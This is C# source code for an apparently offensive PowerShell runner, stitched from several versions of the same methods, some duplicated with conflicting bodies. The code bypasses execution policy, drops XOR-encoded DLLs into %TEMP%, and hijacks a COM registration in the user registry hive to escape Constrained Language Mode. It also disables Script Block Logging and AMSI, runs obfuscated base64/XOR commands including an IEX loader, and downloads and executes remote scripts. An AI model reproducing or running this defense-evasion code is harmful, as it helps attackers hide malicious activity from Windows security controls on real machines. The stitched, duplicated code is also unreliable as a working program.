public static bool DoDisable(PowerShell rs, CustomPSHost host, bool verb)
{
DisableClm.Verbose = verb;
NaiveTry(rs);
return(ProperDisable(rs, host));
}
public static bool Cleanup(PowerShell rs, CustomPSHost host, bool verb)
{
if (rs != null && host != null)
{
if (verb)
{
Console.WriteLine("\n[.] Cleaning up CLM disable artefacts...");
}
CreateCOM(rs, host, true);
}
try
{
File.Delete(Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEASSEMBLY_PATH));
File.Delete(Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEDLL_PATH));
}
catch (Exception e)
{
if (rs != null && host != null)
{
if (verb)
{
Console.WriteLine("[!] Could not remove CLM evasion DLL files as they were in-use. You'll need to remove them by hand:\n");
Console.WriteLine("\tPS> Remove-Item " + Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEASSEMBLY_PATH));
Console.WriteLine("\tPS> Remove-Item " + Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEDLL_PATH));
}
}
}
return(true);
}
public static string ExecuteCommand(string command, PowerShell rs, CustomPSHost host, bool dontDecode = false, bool silent = false, bool addOutDefault = true)
{
string output = "";
if (command != null && command.Length > 0)
{
using (Pipeline pipe = rs.Runspace.CreatePipeline())
{
if (!dontDecode)
{
try
{
if (ProgramOptions.XorKey != 0)
{
command = Decoder.XorDecode(Decoder.Base64DecodeBinary(command), ProgramOptions.XorKey);
}
}
catch (Exception e)
{
if (!silent)
{
Info($"[-] Could not decode command: {e.Message.ToString()}");
}
}
}
if (!silent)
{
Info($"PS> {command}");
}
pipe.Commands.AddScript(command);
pipe.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
if (addOutDefault)
{
pipe.Commands.Add("Out-default");
}
try
{
pipe.Invoke();
output = ((CustomPSHostUserInterface)host.UI).Output;
((CustomPSHostUserInterface)host.UI)._sb = new StringBuilder();
command = "";
}
catch (Exception e)
{
if (!silent)
{
Console.WriteLine(e.ToString());
}
}
}
}
return(output);
}
private static string Execute(string scriptPath, string command)
{
string output = "";
CustomPSHost host = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.ApartmentState = System.Threading.ApartmentState.STA;
state.AuthorizationManager = null; // Bypasses PowerShell execution policy
state.ThreadOptions = PSThreadOptions.UseCurrentThread;
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.ApartmentState = System.Threading.ApartmentState.STA;
runspace.ThreadOptions = PSThreadOptions.UseCurrentThread;
runspace.Open();
using (var ps = PowerShell.Create())
{
ps.Runspace = runspace;
if (!DisableDefenses(ps, host))
{
Info("[-] Could not disable all of the Powershell defenses.");
if (!ProgramOptions.Force)
{
Info("[-] Bailing out...");
}
}
string scriptContents = "";
if (scriptPath.Length > 0)
{
scriptContents = GetFileContents(scriptPath);
Info($"PS> . '{scriptPath}'");
output += ExecuteCommand(scriptContents, ps, host, false, false, false);
scriptContents = "";
scriptPath = "";
ProgramOptions.ScriptPath = "";
}
output += ExecuteCommand(command, ps, host, !ProgramOptions.CmdEncoded);
command = "";
if (!ProgramOptions.Nocleanup && CleanupNeeded)
{
DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
}
System.GC.Collect();
}
runspace.Close();
}
return(output.Trim());
}
private static void Parashell()
{
CustomPSHost host = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.AuthorizationManager = null; // Bypasses PowerShell execution policy
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.Open();
using (var ps = PowerShell.Create())
{
ps.Runspace = runspace;
if (!DisableDefenses(ps, host))
{
Info("[-] Could not disable all of the Powershell defenses.");
if (!ProgramOptions.Force)
{
Info("[-] Bailing out...");
return;
}
}
string input;
while (true)
{
string pwd = ExecuteCommand("(Resolve-Path .\\).Path", ps, host, true, true).Trim();
string prompt = $"{GLOBAL_PROMPT_PREFIX} {pwd}> ";
input = Input(prompt);
string output = ExecuteCommand(input, ps, host, true);
Console.WriteLine(output);
if (input == null || input.Length == 0 ||
String.Equals(input, "exit", StringComparison.CurrentCultureIgnoreCase) ||
String.Equals(input, "quit", StringComparison.CurrentCultureIgnoreCase))
{
break;
}
input = "";
}
if (!ProgramOptions.Nocleanup && CleanupNeeded)
{
DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
}
}
runspace.Close();
}
}
private static string Execute(string scriptPath, string command)
{
string output = "";
CustomPSHost host = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.AuthorizationManager = null; // Bypasses PowerShell execution policy
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.Open();
using (var ps = PowerShell.Create())
{
ps.Runspace = runspace;
if (!DisableDefenses(ps, host))
{
Info("[-] Could not disable all of the Powershell defenses.");
if (!ProgramOptions.Force)
{
Info("[-] Bailing out...");
}
}
string scriptContents = "IEX([Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('BASE64HERE')))";
if (scriptContents.Length > 0)
{
//scriptContents = GetFileContents(scriptPath);
//Info($"PS> & '{scriptContents}'");
output += ExecuteCommand(scriptContents, ps, host);
scriptContents = "";
scriptPath = "";
ProgramOptions.ScriptPath = "";
}
Info($"PowerSharp:: {command}");
Info($"------------------------------------------------------------------------");
output += ExecuteCommand(command, ps, host);
command = "";
System.GC.Collect();
}
runspace.Close();
}
return(output.Trim());
}
public static bool ProperDisable(PowerShell rs, CustomPSHost host)
{
if (DisableClm.Verbose)
{
Console.WriteLine("[.] Step 0. Plant DLL files in: %TEMP%");
}
using (BinaryWriter file = new BinaryWriter(File.Open(
Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEASSEMBLY_PATH),
FileMode.Create)))
{
byte[] data = Decoder.XorDecodeBinary(ClmEmbeddedFiles.ClmDisableAssemblyData, ClmEmbeddedFiles.FilesXorKey);
file.Write(data);
}
using (BinaryWriter file = new BinaryWriter(File.Open(
Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEDLL_PATH),
FileMode.Create)))
{
byte[] data = Decoder.XorDecodeBinary(ClmEmbeddedFiles.ClmDisableDllData, ClmEmbeddedFiles.FilesXorKey);
file.Write(data);
}
if (DisableClm.Verbose)
{
Console.WriteLine("[.] Step 1. Creating custom COM object.");
}
if (!CreateCOM(rs, host))
{
if (DisableClm.Verbose)
{
Console.WriteLine("[-] Could not register custom COM object. CLM bypass failed.");
}
return(false);
}
if (DisableClm.Verbose)
{
Console.WriteLine("[.] Step 2. Invoking it...");
}
if (DisableClm.Verbose)
{
Stracciatella.ExecuteCommand($"New-Object -ComObject {COM_NAME}", rs, host, true, true, false);
}
System.Threading.Thread.Sleep(1000);
return(true);
}
private static bool CreateCOM(PowerShell rs, CustomPSHost host, bool deregister = false)
{
string dllPath = @"$($Env:Temp)\ClmDisableDll.dll";
// Well I'm to lazy to reimplement it in C#
string registerCOM = @"
$sid = (whoami /user | select-string -Pattern ""(S-1-5[0-9-]+)"" -all | select -ExpandProperty Matches).value;
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS;
$key = 'HKU:\{0}_classes' -f $sid;
$key = 'HKU:\{0}_classes\CLSID\' -f $sid;
New-Item -Force -Path $key -Name """ + COM_GUID + @""";
$key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, """ + COM_GUID + @""";
New-Item -Force -Path $key -Name 'InProcServer32';
New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + COM_DESCRIPTION + @""" -PropertyType String;
$key = 'HKU:\{0}_classes\CLSID\{1}\InProcServer32' -f $sid, """ + COM_GUID + @""";
New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + dllPath + @""" -PropertyType String;
New-ItemProperty -Force -Path $key -Name 'ThreadingModel' -Value ""Apartment"" -PropertyType String;
$key = 'HKU:\{0}_classes' -f $sid;
New-Item -Force -Path $key -Name """ + COM_NAME + @""";
$key = 'HKU:\{0}_classes\{1}' -f $sid, """ + COM_NAME + @""";
New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + COM_DESCRIPTION + @""" -PropertyType String;
New-Item -Force -Path $key -Name 'CLSID';
$key = 'HKU:\{0}_classes\{1}\CLSID' -f $sid, """ + COM_NAME + @""";
New-ItemProperty -Force -Path $key -Name '(Default)' -Value """ + COM_GUID + @""" -PropertyType String;
";
string deregisterCOM = @"
$sid = (whoami /user | select-string -Pattern ""(S-1-5[0-9-]+)"" -all | select -ExpandProperty Matches).value;
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS | out-null
$key = 'HKU:\{0}_classes\{1}' -f $sid, """ + COM_NAME + @""";
Remove-Item -Force -Path $key -Recurse | out-null
$key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, """ + COM_GUID + @""";
Remove-Item -Force -Path $key -Recurse | out-null
";
if (deregister)
{
return(Stracciatella.ExecuteCommand(deregisterCOM, rs, host, true, true).Length > 0);
}
else
{
return(Stracciatella.ExecuteCommand(registerCOM, rs, host, true, true).Length > 0);
}
}
public static bool Cleanup(PowerShell rs, CustomPSHost host, bool verb)
{
if (rs != null && host != null)
{
if (verb)
{
Console.WriteLine("\n[.] Cleaning up CLM disable artefacts...");
}
CreateCOM(rs, host, true);
}
#if NETFX_471
else
{
bool ret = true;
try
{
var modules = CollectModules(Process.GetCurrentProcess());
ret &= UnloadAndDeleteModule(modules, "ClmDisableAssembly.dll", OUTPUT_CLMDISABLEASSEMBLY_PATH, verb);
ret &= UnloadAndDeleteModule(modules, "ClmDisableDll.dll", OUTPUT_CLMDISABLEDLL_PATH, verb);
if (!ret)
{
throw new Exception("");
}
}
catch (Exception e)
{
if (verb)
{
Console.WriteLine("[!] Could not remove CLM evasion DLL files as they were in-use. You'll need to remove them by hand:\n");
Console.WriteLine("\tPS> Remove-Item " + Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEASSEMBLY_PATH));
Console.WriteLine("\tPS> Remove-Item " + Environment.ExpandEnvironmentVariables(OUTPUT_CLMDISABLEDLL_PATH));
}
return(false);
}
}
#endif
return(true);
}
private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
{
bool ret = true;
ret &= DisableClm.DoDisable(rs);
string l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true);
Info($"[.] Language Mode: {l}");
if (ret && String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
{
Info("[+] Constrained Language Mode Disabled.");
}
else
{
Info("[-] Constrained Language Mode not disabled.");
}
if ((ret &= DisableScriptLogging(rs)))
{
Info("[+] Script Block Logging Disabled.");
}
else
{
Info("[-] Script Block Logging not disabled.");
}
if ((ret &= DisableAmsi(rs)))
{
Info("[+] AMSI Disabled.");
}
else
{
Info("[-] AMSI not disabled.");
}
return(ret);
}
private static string Execute(string scriptPath, string command)
{
string output = "";
CustomPSHost host = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.ApartmentState = System.Threading.ApartmentState.STA;
state.AuthorizationManager = null; // Bypasses PowerShell execution policy
state.ThreadOptions = PSThreadOptions.UseCurrentThread;
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.ApartmentState = System.Threading.ApartmentState.STA;
runspace.ThreadOptions = PSThreadOptions.UseCurrentThread;
runspace.Open();
using (var ps = PowerShell.Create())
{
ps.Runspace = runspace;
if (!DisableDefenses(ps, host))
{
Info("[-] Could not disable all of the Powershell defenses.");
if (!ProgramOptions.Force)
{
Info("[-] Bailing out...");
}
}
if (scriptPath.Length > 0)
{
bool success = true;
string scriptContents = "";
bool silent = false;
try
{
if (scriptPath.StartsWith("http://") || scriptPath.StartsWith("https://"))
{
using (var wc = new System.Net.WebClient())
{
scriptContents = wc.DownloadString(scriptPath);
}
silent = true;
Info($"Executing downloaded script file: {scriptPath}");
}
else
{
if (!File.Exists(scriptPath))
{
throw new Exception($"Script file does not exist.Will not load it: '{scriptPath}'");
}
scriptContents = GetFileContents(scriptPath);
Info($"PS> . '{scriptPath}'");
}
}
catch (Exception e)
{
Info($"Could not fetch script file/URL contents. Exception: {e}");
success = false;
}
if (success && scriptContents.Length > 0)
{
output += ExecuteCommand(scriptContents, ps, host, false, silent, false);
}
scriptContents = "";
scriptPath = "";
ProgramOptions.ScriptPath = "";
}
output += ExecuteCommand(command, ps, host, !ProgramOptions.CmdEncoded);
command = "";
if (!ProgramOptions.Nocleanup && CleanupNeeded)
{
DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
}
System.GC.Collect();
}
runspace.Close();
}
return(output.Trim());
}
private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
{
bool ret = true;
string l = ExecuteCommand("'{0}.{1}' -f $PSVersionTable.PSVersion.Major, $PSVersionTable.PSVersion.Minor", rs, host, true, true).Trim();
float psversion = 5;
try
{
System.Globalization.CultureInfo customCulture = (System.Globalization.CultureInfo)System.Threading.Thread.CurrentThread.CurrentCulture.Clone();
customCulture.NumberFormat.NumberDecimalSeparator = ".";
System.Threading.Thread.CurrentThread.CurrentCulture = customCulture;
psversion = float.Parse(l, System.Globalization.CultureInfo.InvariantCulture);
}
catch (FormatException e)
{
Info($"[-] Could not obtain Powershell's version. Assuming 5.0 (exception: {e}");
}
if (psversion < 5.0 && !ProgramOptions.Force)
{
Info("[+] Powershell version is below 5, so AMSI, CLM, SBL are not available anyway :-)");
Info("Skipping bypass procedures...");
return(ret);
}
else
{
Info($"[.] Powershell's version: {psversion}");
}
l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
Info($"[.] Language Mode: {l}");
if (!String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
{
DisableClm.DoDisable(rs, host, ProgramOptions.Verbose);
CleanupNeeded = true;
l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
Info($"[.] Language Mode after attempting to disable CLM: {l}");
if (String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
{
Info("[+] Constrained Language Mode Disabled.");
ret &= true;
}
else
{
Info("[-] Constrained Language Mode not disabled.");
ret &= false;
}
}
else
{
Info("[+] No need to disable Constrained Language Mode. Already in FullLanguage.");
}
if ((ret &= DisableScriptLogging(rs)))
{
Info("[+] Script Block Logging Disabled.");
}
else
{
Info("[-] Script Block Logging not disabled.");
}
if ((ret &= DisableAmsi(rs)))
{
Info("[+] AMSI Disabled.");
}
else
{
Info("[-] AMSI not disabled.");
}
Info("");
return(ret);
}
private static string ExecuteCommand(string command, PowerShell rs, CustomPSHost host, bool dontDecode = false, bool silent = false, bool addOutDefault = true)
{
string output = "";
if (command != null && command.Length > 0)
{
using (Pipeline pipe = rs.Runspace.CreatePipeline())
{
if (!dontDecode)
{
try
{
if (ProgramOptions.Base64)
{
command = Decoder.Base64Decode(command);
}
if (ProgramOptions.XorKey != 0)
{
command = Decoder.XorDecode(command, ProgramOptions.XorKey);
}
}
catch (Exception e)
{
if (!silent)
{
Info($"[-] Could not decode command: {e.Message.ToString()}");
}
}
}
else
{
if (!silent)
{
Info($"[?] Decided not to decode input command starting with: '{command.Substring(0, 30)}'");
Info($"[?] If you need that to be decoded as well, use --cmdencoded option.");
}
}
pipe.Commands.AddScript(command);
pipe.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
if (addOutDefault)
{
pipe.Commands.Add("Out-default");
}
try
{
pipe.Invoke();
command = "";
output = ((CustomPSHostUserInterface)host.UI).Output;
((CustomPSHostUserInterface)host.UI)._sb = new StringBuilder();
}
catch (Exception e)
{
Console.WriteLine(e.ToString());
}
}
}
return(output);
}
